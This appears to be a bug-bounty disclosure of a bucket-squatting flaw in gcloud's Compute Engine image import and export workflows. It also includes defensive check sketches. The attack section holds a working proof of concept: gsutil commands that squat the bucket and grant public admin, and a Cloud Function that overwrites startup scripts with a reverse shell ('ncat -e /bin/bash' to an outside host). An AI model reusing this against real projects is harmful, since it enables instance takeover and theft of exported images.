Vulnerability Details

gcloud has subcommands for importing and exporting Compute Engine images. These commands create Cloud Build jobs that launch an instance in your project to perform the import or export. The workflows themselves come from the open source GoogleCloudPlatform/compute-image-tools repo.

Both workflows use a “scratch” storage bucket for logs, scratch data, and startup scripts. The bucket names follow these formats:

- export: "<project-id>-daisy-bkt-us"

- import: "<project-id>-daisy-bkt"

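If this bucket does not exist, the workflow creates it in the user’s project; otherwise, it simply writes to the existing bucket. There is no verification that the “scratch” bucket actually belongs to the user’s project. Bucket names share a single global namespace, and because these names are not domain names (which would require domain-ownership verification) and do not contain the word “google” (which Cloud Storage forbids in bucket names), an attacker can register the scratch bucket names for any target project.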
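The missing check can be sketched as follows: before writing, compare the project that owns the scratch bucket with the caller’s own project. This is a minimal illustration under stated assumptions, not the fix applied to compute-image-tools. It assumes bucket metadata shaped like the Cloud Storage JSON API bucket resource, whose `projectNumber` field names the owning project; `lookup` is a hypothetical callable that returns that metadata, or `None` when the bucket does not exist.

```python
from typing import Callable, Dict, Optional

# Hypothetical helper type: returns bucket metadata (assumed to be shaped like
# the Cloud Storage JSON API bucket resource) or None if the bucket is absent.
Lookup = Callable[[str], Optional[dict]]


def scratch_bucket_names(project_id: str) -> Dict[str, str]:
    """Scratch bucket names used by the export and import workflows."""
    return {
        "export": f"{project_id}-daisy-bkt-us",
        "import": f"{project_id}-daisy-bkt",
    }


def check_scratch_bucket(name: str, own_project_number: str, lookup: Lookup) -> str:
    """Return "create" or "reuse"; raise if another project owns the bucket."""
    metadata = lookup(name)
    if metadata is None:
        # The bucket does not exist yet, so it can be created in our project.
        return "create"
    owner = str(metadata.get("projectNumber"))
    if owner == str(own_project_number):
        # The bucket exists and is owned by our project, so reuse is safe.
        return "reuse"
    # Someone else registered the name first: refuse to write to it.
    raise PermissionError(
        f"scratch bucket {name!r} is owned by project {owner}, "
        f"not {own_project_number}"
    )
```

Injecting `lookup` keeps the decision logic testable without network access. With a real client, a lookup that fails with a permission error should probably also be treated as a foreign bucket, since it suggests the name exists outside your control.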

Attack Scenario

An attacker can effectively “squat” bucket names for projects they expect might perform an image import/export at some point in the future.

Requirements for the attack:

- attacker must know the project ID of their victim

- victim must not have the scratch bucket (typically created on first run of images import/export)

- attacker must create a bucket named <project-id>-daisy-bkt (for imports) or <project-id>-daisy-bkt-us (for exports)

- attacker must make the bucket accessible to the victim's build (e.g. grant allUsers the storage.buckets.list, storage.objects.get, and storage.objects.create permissions)
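The last requirement can leave a visible trace when the bucket's IAM policy is readable: a scratch bucket created by the victim's own workflow would not grant anything to allUsers by default. The sketch below flags such public bindings. It assumes the policy is a dict in the JSON shape printed by `gsutil iam get gs://BUCKET` (`{"bindings": [{"role": ..., "members": [...]}]}`), and it only catches the public-grant variant used as the example here, not a grant scoped to the victim's own service account or a bucket whose policy the victim cannot read.

```python
from typing import Dict, List, Tuple

# Principals that make a binding effectively public.
PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}


def public_bindings(policy: Dict) -> List[Tuple[str, str]]:
    """Return (role, member) pairs that grant a role to a public principal."""
    found = []
    for binding in policy.get("bindings", []):
        for member in binding.get("members", []):
            if member in PUBLIC_MEMBERS:
                found.append((binding.get("role", ""), member))
    return found
```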

For the export task, the workflow saves the full image in the scratch bucket. This means an attacker can read any image exported by the victim.



For the import task, the workflow uploads a startup_script and several Python files used during the import process. The attacker can listen for updates to their bucket with a Cloud Function, replace these files after upload, and backdoor the scripts used by the import process. When the instance launches, it loads the attacker's backdoored script, giving the attacker control of an instance in the victim project. This effectively grants the attacker control of the <project-number>@cloudbuild.gserviceaccount.com service account for the victim project, with the OAuth scope https://www.googleapis.com/auth/devstorage.read_only.
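The swap works because the instance trusts whatever sits in the bucket when it boots. As a hypothetical mitigation (not necessarily what Google shipped), the client could record a digest of each script before upload and have the consumer compare it with the object's stored checksum before running it. The sketch assumes the format Cloud Storage reports in the JSON API `md5Hash` field, which is the base64 encoding of the raw 16-byte MD5 digest; the function names are illustrative.

```python
import base64
import hashlib


def gcs_md5_b64(data: bytes) -> str:
    """Digest in the same encoding as the Cloud Storage md5Hash field."""
    return base64.b64encode(hashlib.md5(data).digest()).decode("ascii")


def unchanged_since_upload(local_bytes: bytes, object_md5_b64: str) -> bool:
    """True if the stored object's checksum matches what the client uploaded."""
    return gcs_md5_b64(local_bytes) == object_md5_b64
```

For this to help, the expected digest must travel through a channel the attacker cannot write (not through the bucket itself), and the comparison must run immediately before the file is used, since an attacker-controlled trigger can still replace the object between the check and its use.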

Attacker setup

Create the bucket and grant permission to allUsers:

```shell
gsutil mb gs://psgttllaecgoqtqq-daisy-bkt
gsutil iam ch "allUsers:admin" gs://psgttllaecgoqtqq-daisy-bkt
```

Note: the command above grants admin, but only the storage.buckets.list, storage.objects.get, and storage.objects.create permissions are required.



Set up a Cloud Function to trigger on writes and backdoor the startup script:

Screenshot of Cloud Function with trigger on bucket:

Source code:

```python
from google.cloud import storage
from google.cloud.storage import Blob

client = storage.Client()

# NOTE: replace this with your desired commands to execute in the victim instance
backdoor_sh = """#!/bin/bash
apt-get update
apt-get install -y nmap
ncat -e /bin/bash lf.lc 4444
"""

def backdoor(event, context):
    """Triggered by a change to a Cloud Storage bucket."""
    name = event['name']
    print(f'Processing file write: {name}')
    bucket = client.get_bucket(event['bucket'])
    if 'startup_script' in name or name.endswith('.sh'):
        print(f'Backdooring: {name}')
        blob = bucket.get_blob(name)
        # simple check to avoid repeatedly backdooring the object
        if b'ncat' not in blob.download_as_string():
            blob = bucket.get_blob(name)
            blob.upload_from_string(backdoor_sh, content_type=blob.content_type)
```

Victim setup



Run an import:

```shell
gcloud compute images import my-ubuntu --os=centos-8 \
    --source-image=projects/centos-cloud/global/images/centos-8-v20200910
```

Screenshot of victim running gcloud images import:

Result



Screenshot of bucket (showing files created by victim import job):

Screenshot of shell after import job launched using backdoored startup script:

Timeline

- 2020-09-19: Issue reported to Google VRP

- 2020-09-22: Issue triaged

- 2020-09-22: Internal bug report filed

- 2020-09-29: VRP issued reward ($3133.70)